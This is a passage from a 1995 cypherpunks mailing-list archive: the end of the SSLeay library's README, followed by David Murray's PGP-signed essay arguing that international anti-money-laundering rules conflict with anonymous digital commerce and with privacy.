but it lists the functions, you will probably have to look at
the code to work out how to use them.  I will be working on
documentation.  Look at the example programs.
There should be a SSL reference manual which is being put together by
Tim Hudson (tjh@mincom.oz.au) in the same location as this
distribution.  This contains a lot more information that is very
useful.  For a description of X509 Certificates, their use, and
certification, read rfc1421, rfc1422, rfc1423 and rfc1424.  ssl/README
also goes over the mechanism.

We have set up some mailing lists for use by people that are interested
in helping develop this code and/or ask questions.
    ssl-bugs@mincom.oz.au
    ssl-users@mincom.oz.au
    ssl-users-request@mincom.oz.au

This library is reasonably stable now.  Version 0.5 has had extensive
rewriting since version 0.4.  The purify package has been used extensively
and I believe most if not all memory leaks have been removed.
There are no writable global variables so a multi-threaded/DLL version of
the library should be quite simple to write.

Look at TODO for a list of things I know I still need to do.

eric (December 1995)

Eric Young (eay@mincom.oz.au)
86 Taunton St.
Annerley 4103.
Australia.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdavidm@iconz.co.nz (David Murray)
Date: Wed, 20 Dec 95 23:24:52 PST
To: cypherpunks@toad.com
Subject: The War on Some Money [long]
Message-ID: <pnr416938529b@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[Yes - money laundering _again_.]

I want to advance two theses:

1. That the interest and activities of governments in fighting money-laundering
is directly contrary to the interest and activities of those seeking to
develop anonymous digital commerce;

2. That there is a related, if not underlying, conflict between the rhetoric
of concealment and the rhetoric of privacy.

<Of course, what _does_ underlie all of this is individual vs. state -- but that
is pretty much a given.>

If the push for anonymous digital commerce is exemplified by the Cypherpunks
(and let's pretend it is), the battle against money-laundering is being led by
the Financial Action Task Force (FATF), an autonomous international entity,
set up by the G7 as part of the orgy of post-cold-war co-operation between
States on this issue. The UN, G7, OAS, Commonwealth, EU and a host of supra-
national bodies have called for co-ordinated action on stamping out dirty
money. And in an unprecedented fashion, States have responded. There are over
100 States that either have or are considering the criminalisation of money-
laundering. These include, by and large, the tax havens of Europe, the
Caribbean and the South Pacific.

So what is criminal money laundering? Concealing the source of funds that one
knows come from serious crime. Three comments about this formulation:

1. The state of mind required is knowledge, although this knowledge can be
inferred from objective facts (and knowledge tests in criminal definitions are
notoriously elastic).

2. The source of funds must be serious crime. The early UN declaration only
referred to drug dealing, but since 1990 there has been a move to widen this
to all serious crime. As to what constitutes serious crime, this is still
somewhat up for grabs. Some of the BSA's statements about software piracy
being the drug dealing of the nineties, and linking piracy with organised
crime can be seen as a strategy to position large scale intellectual property
theft as serious crime. More ominous (at least for the relationship of
citizen and state) is the occasional reference to tax evasion in the same
breath as serious crime.

3. This is because the serious crime need not be committed in the same country
as the money laundering. This makes sense for conventional serious crime (to
coin a phrase), but if tax evasion is included represents a major departure
from the convention that the courts of one country will not enforce the 
taxing statutes of another.

Note also the possibility that fraud might be serious crime, which, since
the test of fraud is dishonesty, directly brings the competing ethical (or
rhetorical) systems into conflict. But more of this below.

The key feature of the new supra-national regime, however, is not a more or
less co-ordinated criminal law (there are some marked variations on
the above scheme), but the new surveillance approach to the financial system.

The most obvious signs of this are the requirement of financial institutions
to "know your customer" (which includes an explicit prohibition of anonymous
accounts) and to report "suspicious" transactions. But the approach goes much
further. The FATF's chilling Forty Recommendations (on which the global
approach is largely based) urges countries to "further encourage in general
the development of modern and secure techniques of money management, including
increased use of cheques, payment cards, direct deposit of salary cheques, and
book entry recording of securities, as a means to encourage the replacement of
cash transfers." [This is taken from a synopsis of the Recommendations.] In
case anyone should think this is based on the insecurity to the _customer_ of
cash and bearer securities, the FATF suggests countries (i.e. Governments) may
like to consider monitoring all domestic financial transactions with a view
to building databases for computer analysis -- such databases to be 
appropriately secured from unauthorised access, of course.

So there we have it. The FATF wants a cashless, book entry, universally
monitored financial system based on verified True Names. Some Cypherpunks want
a cash based, bearer certificate, mathematically unmonitorable financial
system revolving around impenetrable pseudonyms.

Another way to put this is that Cypherpunks are for privacy, but the FATF is
against concealment.

Three arguments are often made for the attack on money laundering.

1. Money laundering leads to the corruption of societies and the undermining
of institutions and States. This seems to be putting the cart before the horse,
somewhat. Even if you consider money laundering as an inextricable part of
rendering crime organised, the crimes usually cited (drug dealing, 
environmental crime, and the smuggling of cultural artifacts [!]) could be
decriminalised relatively easily. And of course you could always abolish the
State :-)

2. Money laundering puts the financial system at risk. (This, of course, is why
the financial institutions used in the Pizza Connection money laundering
chain (Merrill Lynch, E F Hutton, Bankers Trust, Barclays, Chase Manhattan,
Chemical Bank, Citibank, American Express and Thomas Cook. Bank of Nova Scotia,
Ueberseebank (Switzerland)) have without fail spectacularly collapsed.) In so
far as this is a result of legislation providing for the forfeiture to the
State of the proceeds of crime, another solution is clearly available.

3. The War on Drugs has been a failure, because it isn't in anyone in the drug
distribution chain's interest to assist authorities. The financial system is
organised crime's exposed flank. (As an(other) aside, it is often mentioned
(asserted?) that terrorists are turning to drug dealing etc to finance their
terror campaigns. I'm not sure whether this is intended to combat the "drug
dealers are just businessmen" argument, or the "terrorists are just patriots"
one. Perhaps both.)

[Don't get me wrong. I'm not saying Statists are bad because drug dealers are
good. I realise that reasonable people can differ as to the trade off between
civil liberties and the protection of the State. I know people who think that
it is all right to let the Police randomly breath test drivers in order to
decrease road deaths. So I can easily imagine people might feel having to
front up with two types of ID to open a bank account is a small price to pay
to prevent the violence and misery of drug addiction. I happen to think both
sets of people are wrong, and dangerously so.]

So governments fight money laundering to make it harder for criminals to enjoy
the wealth governments can't stop them making. As a side effect, governments
gain valuable intelligence about everyone's everyday finances. And we might
as well look at cracking down on those evil tax evaders while we're at it...

Well -- even I'm willing to admit this summary is a tad glib. It misses
something important about attitudes to secrecy: whether secrecy is about
privacy or concealment.

Michael Froomkin often [:-)] cites Sissela Bok on the danger of secrets
inappropriately kept (see e.g. A. Michael Froomkin, "Anonymity and its
Enmities," 1995 J. Online L. art. 4, par. 51) -- and certainly the overtones
of locked doors, masks, whispers and shadows makes "secret" itself a suspect
word. To be open is almost always good; to be secretive is definitely
always bad.

This sense of the inherent evil of secrets (dark secrets, guilty secrets) runs
deep. Take the Equiticorp criminal trial (a local cause celebre of a few years
ago) where executives of a company that failed spectacularly after the '87
crash were charged with (inter alia) conspiracy to defraud. The executives in
question had caused a large sum of money of (at that time) completely unknown
provenance (the so called H-Fee) to be paid to themselves through a series of 
companies in tax-haven/banking secrecy jurisdictions. The judge (there was no
jury) found that, because no one had offered an honest reason to use such a 
structure, it could only have been for the purpose of concealment of the
source of the money from those who may have had a legitimate interest in
determining it (IRD, auditors etc.). This amounted to dishonesty, and the
charge of conspiracy to defraud was made out.

Note the reasoning here: a secret without a reason is concealment; concealment
is dishonest. (Cypherpunks would reason exactly oppositely: a secret is an
expression of privacy; privacy is good.)

We can extend the concealment reasoning in an interesting way: concealment ->
dishonesty -> fraud -> serious crime + concealment -> money laundering. So
widespread concealment can (conceivably) give rise to an offence of money
laundering with no other illegal act. The very fact that the State has an
interest in detecting money laundering strengthens that first link: concealment
- -> dishonesty.

For the cypherpunks, of course, privacy -> nothing at all. Secrecy=privacy is
the default. Secrecy=concealment is a red herring.

This is not the forum to recite the virtues of privacy. So I'll leave you [at
last, they cry!] with a suggestion as to its main (rhetorical) vice: privacy
is opposed to public, and public is (usually) good.

I'll go further. In the same way that "secret" gives rise to a cascade of
negative associations, "public" gives rise to a chain reaction of happy, if
not downright noble, thoughts: the public good; public service; the public's
right to know; and, of course, the republic itself. Private (and privacy), on
the other hand, gains meaning from its distinction from public -- it is
_inherently_ negative.

All this is so much old rope for those who reject the linguistic turn in
philosophy, but I find it a useful way of thinking about trends. And we are
seeing trends towards individuality, the rejection of the collective, the
privatisation of what once was public. Part of this will be the reversal
of the privileging of public over private, and the consequent/connected move
from secrecy=concealment to secrecy=privacy.

And a tangible manifestation of all that will be the rise of anonymous digital
commerce, and the abandonment of The War on Some Money.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNkJOVlo3j8JHzalAQGA/gP8D1mKUVyzybOVuI2AknuznciwghtvndH9
I0GtFnti8zFANMo6LIqb5/Hlz/XDTG6SFZR5D9omFlAd/J781pInaiEtTfXr/y+M
BXOppcvXfo28adGR5bgi+JLoZE9XQ511Qrz+HKi7Oa47LudySpRHkd/THM1Wamnw
9aWkxh5JOXs=
=FoHd
-----END PGP SIGNATURE-----

[Palmtop News Reader - Beta Version 3]





